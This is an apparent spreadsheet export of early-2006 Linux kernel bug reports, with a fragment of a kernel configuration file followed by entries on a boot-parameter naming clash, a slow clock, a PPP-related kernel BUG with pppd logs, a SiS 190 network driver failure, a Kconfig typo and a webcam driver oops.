set # CONFIG_SENSORS_W83L785TS is not set # CONFIG_SENSORS_W83627HF is not set # CONFIG_SENSORS_W83627EHF is not set # CONFIG_SENSORS_HDAPS is not set # CONFIG_HWMON_DEBUG_CHIP is not set # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia Capabilities Port drivers # # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # # # Video Adapters # # CONFIG_VIDEO_BT848 is not set # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CQCAM is not set # CONFIG_VIDEO_W9966 is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5246A is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_STRADIS is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # CONFIG_VIDEO_CX88 is not set # CONFIG_VIDEO_EM28XX is not set # CONFIG_VIDEO_OVCAMCHIP is not set # CONFIG_VIDEO_AUDIO_DECODER is not set # CONFIG_VIDEO_DECODER is not set # # Radio Adapters # # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # CONFIG_FB=y CONFIG_FB_CFB_FILLRECT=y CONFIG_FB_CFB_COPYAREA=y CONFIG_FB_CFB_IMAGEBLIT=y # CONFIG_FB_MACMODES is not set CONFIG_FB_MODE_HELPERS=y # CONFIG_FB_TILEBLITTING is not set # CONFIG_FB_CIRRUS is not set # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ARC is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_S1D13XXX is not set # CONFIG_FB_NVIDIA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON_OLD is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SAVAGE is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_CYBLA is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_GEODE is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=y # CONFIG_FRAMEBUFFER_CONSOLE_ROTATION is not set CONFIG_FONTS=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y CONFIG_FONT_6x11=y CONFIG_FONT_7x14=y CONFIG_FONT_PEARL_8x8=y CONFIG_FONT_ACORN_8x8=y CONFIG_FONT_MINI_4x6=y CONFIG_FONT_SUN8x16=y CONFIG_FONT_SUN12x22=y CONFIG_FONT_10x18=y # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y CONFIG_BACKLIGHT_LCD_SUPPORT=y CONFIG_BACKLIGHT_CLASS_DEVICE=m CONFIG_BACKLIGHT_DEVICE=y CONFIG_LCD_CLASS_DEVICE=m CONFIG_LCD_DEVICE=y # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # CONFIG_SND=m CONFIG_SND_AC97_CODEC=m CONFIG_SND_AC97_BUS=m CONFIG_SND_TIMER=m CONFIG_SND_PCM=m CONFIG_SND_RAWMIDI=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=m CONFIG_SND_SEQ_RTCTIMER_DEFAULT=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set CONFIG_SND_GENERIC_DRIVER=y # # Generic devices # CONFIG_SND_MPU401_UART=m CONFIG_SND_DUMMY=m # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set CONFIG_SND_MPU401=m # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_ATIIXP_MODEM is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_EMU10K1X is not set # CONFIG_SND_CA0106 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_HDSPM is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_AD1889 is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=m CONFIG_SND_INTEL8X0M=m # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VIA82XX_MODEM is not set # CONFIG_SND_VX222 is not set # CONFIG_SND_HDA_INTEL is not set # # USB devices # # CONFIG_SND_USB_AUDIO is not set # CONFIG_SND_USB_USX2Y is not set # # PCMCIA devices # # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB_ARCH_HAS_HCD=y CONFIG_USB_ARCH_HAS_OHCI=y CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # CONFIG_USB_SUSPEND is not set # CONFIG_USB_OTG is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set # CONFIG_USB_ISP116X_HCD is not set CONFIG_USB_OHCI_HCD=m # CONFIG_USB_OHCI_BIG_ENDIAN is not set CONFIG_USB_OHCI_LITTLE_ENDIAN=y # CONFIG_USB_UHCI_HCD is not set # CONFIG_USB_SL811_HCD is not set # # USB Device Class drivers # # CONFIG_OBSOLETE_OSS_USB_DRIVER is not set # CONFIG_USB_ACM is not set CONFIG_USB_PRINTER=m # # NOTE: USB_STORAGE enables SCSI, and 'SCSI disk support' # # # may also be needed; see USB_STORAGE Help for more information # CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set CONFIG_USB_STORAGE_DPCM=y # CONFIG_USB_STORAGE_USBAT is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Input Devices # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_ACECAD is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_ITMTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_YEALINK is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # CONFIG_USB_KEYSPAN_REMOTE is not set # CONFIG_USB_APPLETOUCH is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_VICAM is not set # CONFIG_USB_DSBR is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set # CONFIG_USB_OV511 is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_SN9C102 is not set # CONFIG_USB_STV680 is not set # CONFIG_USB_PWC is not set # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # CONFIG_USB_ZD1201 is not set # CONFIG_USB_MON is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_EMI62 is not set # CONFIG_USB_EMI26 is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_LEGOTOWER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_LED is not set # CONFIG_USB_CYTHERM is not set # CONFIG_USB_PHIDGETKIT is not set # CONFIG_USB_PHIDGETSERVO is not set # CONFIG_USB_IDMOUSE is not set # CONFIG_USB_SISUSBVGA is not set # CONFIG_USB_LD is not set # CONFIG_USB_TEST is not set # # USB DSL modem support # # # USB Gadget Support # # CONFIG_USB_GADGET is not set # # MMC/SD Card support # CONFIG_MMC=m # CONFIG_MMC_DEBUG is not set CONFIG_MMC_BLOCK=m CONFIG_MMC_WBSD=m # # InfiniBand support # # CONFIG_INFINIBAND is not set # # SN Devices # # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y CONFIG_EXT2_FS_POSIX_ACL=y CONFIG_EXT2_FS_SECURITY=y # CONFIG_EXT2_FS_XIP is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_EXT3_FS_SECURITY=y CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set # CONFIG_MINIX_FS is not set # CONFIG_ROMFS_FS is not set CONFIG_INOTIFY=y CONFIG_QUOTA=y CONFIG_QFMT_V1=m CONFIG_QFMT_V2=m CONFIG_QUOTACTL=y CONFIG_DNOTIFY=y CONFIG_AUTOFS_FS=m CONFIG_AUTOFS4_FS=y # CONFIG_FUSE_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=m CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=m CONFIG_UDF_FS=m CONFIG_UDF_NLS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m CONFIG_MSDOS_FS=m CONFIG_VFAT_FS=m CONFIG_FAT_DEFAULT_CODEPAGE=437 CONFIG_FAT_DEFAULT_IOCHARSET="iso8859-1" CONFIG_NTFS_FS=m # CONFIG_NTFS_DEBUG is not set CONFIG_NTFS_RW=y # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_SYSFS=y CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # CONFIG_RELAYFS_FS is not set # # </t>
  </si>
  <si>
    <t>Misnamed boot parameter "noapictimer" shadows "noapic"</t>
  </si>
  <si>
    <t>2.6.15 (SuSE pre)</t>
  </si>
  <si>
    <t>2006-01-11 06:56 UTC</t>
  </si>
  <si>
    <t>Stefan Behnel</t>
  </si>
  <si>
    <t>2006-01-11 09:09 UTC</t>
  </si>
  <si>
    <t>My buggy AMD64 machine (ATI RS480 chipset) requires the "noapictimer" option to keep the clock from going wild. The problem is that it does not generally require the "noapic" option, but since the timer option starts with that string, the kernel happily assumes that option to be set as well and disables the IO-APIC completely. I'd propose renaming the option to "no_apic_timer" (similar to the existing x86_64 option "no_timer_check"). I tried renaming it in the source (apic.c) and it solves the problem.</t>
  </si>
  <si>
    <t>Clock runs too slow</t>
  </si>
  <si>
    <t>2.6.15-mm3 (and -mm2 &amp; -mm1 too)</t>
  </si>
  <si>
    <t>2006-01-11 09:41 UTC</t>
  </si>
  <si>
    <t>2006-01-20 08:41 UTC</t>
  </si>
  <si>
    <t>There seems to be something wrong with time in kernels 2.6.15-mm1, -mm2 and -mm3: the following command doesn't return for a long time (I waited about 40 seconds and pressed CTRL-C. [root@terrop ~]# sleep 1 It also seems that clock is running too slow: an hour of wall clock gives an uptime of about half an hour. This only happens if I boot those kernels without options. If I use 'clocksource=pit' everything works. This seems to be related to the new timer subsystem. I also tested 2.6.15-git7 and it works correctly. This is an old IBM ThinkPad 380XD laptop.</t>
  </si>
  <si>
    <t>After pon: Kernel BUG at net/core/skbuff.c:94 - seems to disable keyboard</t>
  </si>
  <si>
    <t>2006-01-11 13:04 UTC</t>
  </si>
  <si>
    <t>Wolfgang</t>
  </si>
  <si>
    <t>2006-01-22 04:06 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.9 (did not test any later) Distribution: 64bit Debian Hardware Environment: AMD64, PS/2 keyboard, 3COM US Robotics modem Software Environment: dist-upgrade on 2006-01-10 Problem Description: First: I am not really familiar with kernel bug reporting. So if you have questions, ask me at wol (at) kulmbach (dot) net I did a dist-upgrade and a kernel-update from 2.6.9 to 2.6.15. Afterwards: When I do a pon, a bug report (attached below) is filed to the logs. The behaviour I observe is: I seem to get no connection, although it seems to login at my provider. AND: My keyboard stops working while it dials. So after the first pon, I have no keyboard until rebooting. After several seconds, the modem shuts up. Steps to reproduce: Log: Jan 11 21:22:02 eiswiese pppd[2372]: pppd 2.4.4b1 started by root, uid 0 Jan 11 21:22:03 eiswiese chat[2373]: abort on (BUSY) Jan 11 21:22:03 eiswiese chat[2373]: abort on (NO CARRIER) Jan 11 21:22:03 eiswiese chat[2373]: abort on (VOICE) Jan 11 21:22:03 eiswiese chat[2373]: abort on (NO DIALTONE) Jan 11 21:22:03 eiswiese chat[2373]: abort on (NO DIAL TONE) Jan 11 21:22:03 eiswiese chat[2373]: abort on (NO ANSWER) Jan 11 21:22:03 eiswiese chat[2373]: abort on (DELAYED) Jan 11 21:22:03 eiswiese chat[2373]: send (AT&amp;F1X3^M) Jan 11 21:22:03 eiswiese chat[2373]: expect (OK) Jan 11 21:22:03 eiswiese chat[2373]: AT&amp;F1X3^M^M Jan 11 21:22:03 eiswiese chat[2373]: OK Jan 11 21:22:03 eiswiese chat[2373]: -- got it Jan 11 21:22:03 eiswiese chat[2373]: send (ATDT019102244^M) Jan 11 21:22:04 eiswiese chat[2373]: expect (CONNECT) Jan 11 21:22:04 eiswiese chat[2373]: ^M Jan 11 21:22:29 eiswiese chat[2373]: ATDT019102244^M^M Jan 11 21:22:29 eiswiese chat[2373]: CONNECT Jan 11 21:22:29 eiswiese chat[2373]: -- got it Jan 11 21:22:29 eiswiese chat[2373]: send (\d) Jan 11 21:22:30 eiswiese pppd[2372]: Serial connection established. Jan 11 21:22:30 eiswiese pppd[2372]: using channel 1 Jan 11 21:22:30 eiswiese pppd[2372]: Using interface ppp0 Jan 11 21:22:30 eiswiese pppd[2372]: Connect: ppp0 &lt;--&gt; /dev/ttyS0 Jan 11 21:22:31 eiswiese pppd[2372]: sent [LCP ConfReq id=0x1 &lt;asyncmap 0x0&gt; &lt;magic 0x59aedb80&gt; &lt;pcomp&gt; &lt;accomp&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [LCP ConfReq id=0x1 &lt;mru 1524&gt; &lt;asyncmap 0x0&gt; &lt;auth pap&gt; &lt;pcomp&gt; &lt;accomp&gt; &lt;mrru 15 24&gt; &lt;endpoint [local:73.74.61.63.6b.69.6e.67]&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [LCP ConfRej id=0x1 &lt;mrru 1524&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [LCP ConfAck id=0x1 &lt;asyncmap 0x0&gt; &lt;magic 0x59aedb80&gt; &lt;pcomp&gt; &lt;accomp&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [LCP ConfReq id=0x2 &lt;mru 1524&gt; &lt;asyncmap 0x0&gt; &lt;auth pap&gt; &lt;pcomp&gt; &lt;accomp&gt; &lt;endpoin t [local:73.74.61.63.6b.69.6e.67]&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [LCP ConfAck id=0x2 &lt;mru 1524&gt; &lt;asyncmap 0x0&gt; &lt;auth pap&gt; &lt;pcomp&gt; &lt;accomp&gt; &lt;endpoin t [local:73.74.61.63.6b.69.6e.67]&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [LCP EchoReq id=0x0 magic=0x59aedb80] Jan 11 21:22:32 eiswiese pppd[2372]: sent [PAP AuthReq id=0x1 user="ONCOM/BNK-00823" password=&lt;hidden&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [LCP EchoRep id=0x0 magic=0x0] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [PAP AuthAck id=0x1 ""] Jan 11 21:22:32 eiswiese pppd[2372]: PAP authentication succeeded Jan 11 21:22:32 eiswiese pppd[2372]: kernel does not support PPP filtering Jan 11 21:22:32 eiswiese pppd[2372]: sent [CCP ConfReq id=0x1 &lt;deflate 15&gt; &lt;deflate(old#) 15&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [IPCP ConfReq id=0x1 &lt;compress VJ 0f 01&gt; &lt;addr 0.0.0.0&gt; &lt;ms-dns1 0.0.0.0&gt; &lt;ms-dns3 0.0.0.0&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [IPCP ConfReq id=0x1 &lt;compress VJ 0f 01&gt; &lt;addr 193.158.132.145&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [IPCP ConfAck id=0x1 &lt;compress VJ 0f 01&gt; &lt;addr 193.158.132.145&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [CCP ConfReq id=0x1 &lt; 11 05 00 01 04&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [CCP ConfRej id=0x1 &lt; 11 05 00 01 04&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [CCP ConfRej id=0x1 &lt;deflate 15&gt; &lt;deflate(old#) 15&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [CCP ConfReq id=0x2] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [IPCP ConfNak id=0x1 &lt;addr 217.250.225.117&gt; &lt;ms-dns1 217.237.151.97&gt; &lt;ms-dns3 217. 237.150.33&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [IPCP ConfReq id=0x2 &lt;compress VJ 0f 01&gt; &lt;addr 217.250.225.117&gt; &lt;ms-dns1 217.237.1 51.97&gt; &lt;ms-dns3 217.237.150.33&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [CCP ConfReq id=0x2 &lt; 11 06 00 01 01 03&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: sent [CCP ConfRej id=0x2 &lt; 11 06 00 01 01 03&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [CCP ConfRej id=0x2] Jan 11 21:22:32 eiswiese pppd[2372]: rcvd [IPCP ConfAck id=0x2 &lt;compress VJ 0f 01&gt; &lt;addr 217.250.225.117&gt; &lt;ms-dns1 217.237.1 51.97&gt; &lt;ms-dns3 217.237.150.33&gt;] Jan 11 21:22:32 eiswiese pppd[2372]: Cannot determine ethernet address for proxy ARP Jan 11 21:22:32 eiswiese pppd[2372]: local IP address 217.250.225.117 Jan 11 21:22:32 eiswiese pppd[2372]: remote IP address 193.158.132.145 Jan 11 21:22:32 eiswiese pppd[2372]: primary DNS address 217.237.151.97 Jan 11 21:22:32 eiswiese pppd[2372]: secondary DNS address 217.237.150.33 Jan 11 21:22:32 eiswiese pppd[2372]: Script /etc/ppp/ip-up started (pid 2393) Jan 11 21:22:33 eiswiese pppd[2372]: Script /etc/ppp/ip-up finished (pid 2393), status = 0x0 Jan 11 21:22:45 eiswiese kernel: skb_over_panic: text:ffffffff802ce17a len:8 put:8 head:ffff8100125a0800 data:ffff8101125a08 03 tail:ffff8101125a080b end:ffff8100125a0e00 dev:&lt;NULL&gt; Jan 11 21:22:45 eiswiese kernel: ----------- [cut here ] --------- [please bite here ] --------- Jan 11 21:22:45 eiswiese kernel: Kernel BUG at net/core/skbuff.c:94 Jan 11 21:22:45 eiswiese kernel: invalid operand: 0000 [1] PREEMPT Jan 11 21:22:45 eiswiese kernel: CPU 0 Jan 11 21:22:45 eiswiese kernel: Modules linked in: ipv6 usb_storage sd_mod scsi_mod vfat fat Jan 11 21:22:45 eiswiese kernel: Pid: 3, comm: events/0 Not tainted 2.6.15 #1 Jan 11 21:22:45 eiswiese kernel: RIP: 0010:[&lt;ffffffff8032ad9c&gt;] &lt;ffffffff8032ad9c&gt;{skb_over_panic+92} Jan 11 21:22:45 eiswiese kernel: RSP: 0000:ffff81001fe8fda8 EFLAGS: 00010096 Jan 11 21:22:45 eiswiese kernel: RAX: 000000000000009a RBX: 0000000000000008 RCX: ffffffff80433590 Jan 11 21:22:45 eiswiese kernel: RDX: ffffffff80433590 RSI: 0000000000000001 RDI: ffff81001da6f020 Jan 11 21:22:45 eiswiese kernel: RBP: ffff810018de2000 R08: 000000003b9aca00 R09: ffff81001ded4980 Jan 11 21:22:45 eiswiese kernel: R10: 0000000000000010 R11: 0000000000000010 R12: 0000000000000008 Jan 11 21:22:45 eiswiese kernel: R13: ffff810012ffa5d0 R14: ffff8101125a0803 R15: ffff810012ffa1d0 Jan 11 21:22:45 eiswiese kernel: FS: 00002aaab1db1e80(0000) GS:ffffffff804ed800(0000) knlGS:0000000000000000 Jan 11 21:22:45 eiswiese kernel: CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b Jan 11 21:22:45 eiswiese kernel: CR2: 00002aaaad4b7bb0 CR3: 0000000014657000 CR4: 00000000000006e0 Jan 11 21:22:45 eiswiese kernel: Process events/0 (pid: 3, threadinfo ffff81001fe8e000, task ffff81001fe80710) Jan 11 21:22:45 eiswiese kernel: Stack: ffff8101125a080b ffff8100125a0e00 ffffffff803dfef3 ffffffff802ce184 Jan 11 21:22:45 eiswiese kernel: ffff810018de2088 ffff810012ffa000 0000000000000286 ffff810012ffa000 Jan 11 21:22:45 eiswiese kernel: ffff810012ffa018 0000000000000008 Jan 11 21:22:45 eiswiese kernel: Call Trace:&lt;ffffffff802ce184&gt;{ppp_asynctty_receive+564} &lt;ffffffff80286d80&gt;{flush_to_ldisc+0 } Jan 11 21:22:45 eiswiese kernel: &lt;ffffffff80286ea6&gt;{flush_to_ldisc+294} &lt;ffffffff801430ed&gt;{worker_thread+509} Jan 11 21:22:45 eiswiese kernel: &lt;ffffffff8012d310&gt;{default_wake_function+0} &lt;ffffffff80142ef0&gt;{worker_thread+0} Jan 11 21:22:45 eiswiese kernel: &lt;ffffffff80142ef0&gt;{worker_thread+0} &lt;ffffffff80147bcb&gt;{kthread+219} Jan 11 21:22:45 eiswiese kernel: &lt;ffffffff8010f6fa&gt;{child_rip+8} &lt;ffffffff80147af0&gt;{kthread+0} Jan 11 21:22:45 eiswiese kernel: &lt;ffffffff8010f6f2&gt;{child_rip+0} Jan 11 21:22:45 eiswiese kernel: Jan 11 21:22:45 eiswiese kernel: Code: 0f 0b 68 ba 25 40 80 c2 5e 00 48 83 c4 18 c3 66 66 90 66 90 Jan 11 21:22:45 eiswiese kernel: RIP &lt;ffffffff8032ad9c&gt;{skb_over_panic+92} RSP &lt;ffff81001fe8fda8&gt; Jan 11 21:22:45 eiswiese kernel: &lt;6&gt;note: events/0[3] exited with preempt_count 1 Jan 11 21:25:02 eiswiese pppd[2372]: No response to 4 echo-requests Jan 11 21:25:02 eiswiese pppd[2372]: Serial link appears to be disconnected. Jan 11 21:25:02 eiswiese pppd[2372]: Connect time 2.5 minutes. Jan 11 21:25:02 eiswiese pppd[2372]: Sent 3186 bytes, received 3320 bytes. Jan 11 21:25:02 eiswiese pppd[2372]: Script /etc/ppp/ip-down started (pid 2441) Jan 11 21:25:02 eiswiese pppd[2372]: sent [LCP TermReq id=0x2 "Peer not responding"] Jan 11 21:25:02 eiswiese pppd[2372]: Script /etc/ppp/ip-down finished (pid 2441), status = 0x0 Jan 11 21:25:05 eiswiese pppd[2372]: sent [LCP TermReq id=0x3 "Peer not responding"] Jan 11 21:25:08 eiswiese pppd[2372]: Connection terminated.</t>
  </si>
  <si>
    <t>SiS 190 doesn't download files</t>
  </si>
  <si>
    <t>2.6.22</t>
  </si>
  <si>
    <t>2006-01-11 13:35 UTC</t>
  </si>
  <si>
    <t>Frank</t>
  </si>
  <si>
    <t>2008-10-20 14:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: Gentoo Hardware Environment: On-board SiS 190 network card on ASUS K8S-MX Problem Description: With the sis190 driver that comes with 2.6.15 it is impossible to download files. Small network traffic like ping, ssh terminal work fine, but when I try to download a file with wget, lftp or sftp, the connection (LOGIN, CWD, BIN) is initialized, but when the real download should start (GET) nothing happens. After replacing the sis190.c with the original from sis.com everything worked as expected.</t>
  </si>
  <si>
    <t>Typo in KConfig item description.</t>
  </si>
  <si>
    <t>2006-01-11 15:51 UTC</t>
  </si>
  <si>
    <t>2006-01-11 16:25 UTC</t>
  </si>
  <si>
    <t>The help topic for :Networking\Networking Support\Networking Options\QoS &amp; Fair Queueing\Extended Matches\Metadata in menuconfig contains a typo: "Say Y here if you want to be ablt to classify packets based on..." clearly should be "able to" not "ablt to"</t>
  </si>
  <si>
    <t>w9968cf  oopses with creative webcam go plus</t>
  </si>
  <si>
    <t>2006-01-12 10:06 UTC</t>
  </si>
  <si>
    <t>2006-02-14 09:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Dunno Distribution: Debian testing Hardware Environment: Dual P3 1 GB RAM, Broadcom OSB4/CSB5 OHCI usb chipset, radeon 9200 SE graphics card, IDE disk Software Environment: Kopete 3.5 (kde 3.5) or xawtv Problem Description: I get an oops (not hang) if I plug/unplug the camera quickly while the program is trying to initializate/use the camera Steps to reproduce: 1) Plug in the camera (udev loads the modules) 2) Run xawtv or go to the kopete's 3.5 webcam configuration panel 3) Unplug &amp; plug the camera like mad until you get an oops. I've two different oopses. The first one was taken in 2.6.15-rc5 and the following one the linus' git tree from two days ago or so. Unable to handle kernel NULL pointer dereference at virtual address 0000000c printing eip: c019b162 *pde = 00000000 Oops: 0000 [#1] PREEMPT SMP Modules linked in: ovcamchip w9968cf videodev i2c_core ipt_REJECT radeon drm thermal fan button processor ac battery ipt_MASQUERADE iptable_nat ip_nat ip_conntrack iptable_filter ip_tables usbhid snd_ca0106 snd_rawmidi snd_seq_device snd_ac97_codec snd_pcm_oss snd_mixer_oss snd_pcm parport_pc floppy snd_timer parport ohci_hcd snd pcspkr usbcore e100 soundcore snd_ac97_bus snd_page_alloc CPU: 0 EIP: 0060:[&lt;c019b162&gt;] Not tainted VLI EFLAGS: 00010246 (2.6.15-rc5) EIP is at sysfs_hash_and_remove+0x22/0xef eax: f4789bc8 ebx: f76338a8 ecx: c19b2d40 edx: c533de44 esi: 00000000 edi: f6a79600 ebp: f8962f40 esp: ec721f04 ds: 007b es: 007b ss: 0068 Process kopete (pid: 21843, threadinfo=ec721000 task=c91bfab0) Stack: f6a79600 f4789bc8 e9ce0788 f76338a8 f76338a0 f6a79600 f8962f40 c022e426 00000000 f8962fbc f76338a0 f8870f00 f7094830 f387ed08 c022e488 f4bc0000 f89617c2 ec721f54 f89c1deb f89c8abc f8870f00 f4bc00bc 00000000 f4bc0000 Call Trace: [&lt;c022e426&gt;] class_device_del+0xa6/0x100 [&lt;c022e488&gt;] class_device_unregister+0x8/0x10 [&lt;f89617c2&gt;] video_unregister_device+0x32/0x4d [videodev] [&lt;f89c1deb&gt;] w9968cf_release_resources+0x3b/0xf0 [w9968cf] [&lt;f89c24d0&gt;] w9968cf_release+0x40/0x100 [w9968cf] [&lt;c0163a01&gt;] __fput+0x91/0x180 [&lt;c0162097&gt;] filp_close+0x47/0x90 [&lt;c0103061&gt;] syscall_call+0x7/0xb Code: 26 00 8d bc 27 00 00 00 00 55 57 56 53 83 ec 0c 89 44 24 04 89 14 24 8b 50 10 8b 70 58 85 d2 74 73 f0 ff 4a 78 0f 88 cd 00 00 00 &lt;8b&gt; 46 0c 8d 68 fc 8b 4d 04 0f 18 01 90 83 c6 0c 89 c3 39 f0 89 &lt;6&gt;usb 1-1: OV7620 image sensor initialized usb 1-1: USB disconnect, address 5 usb 1-1: Disconnecting Creative Labs Video Blaster WebCam Go 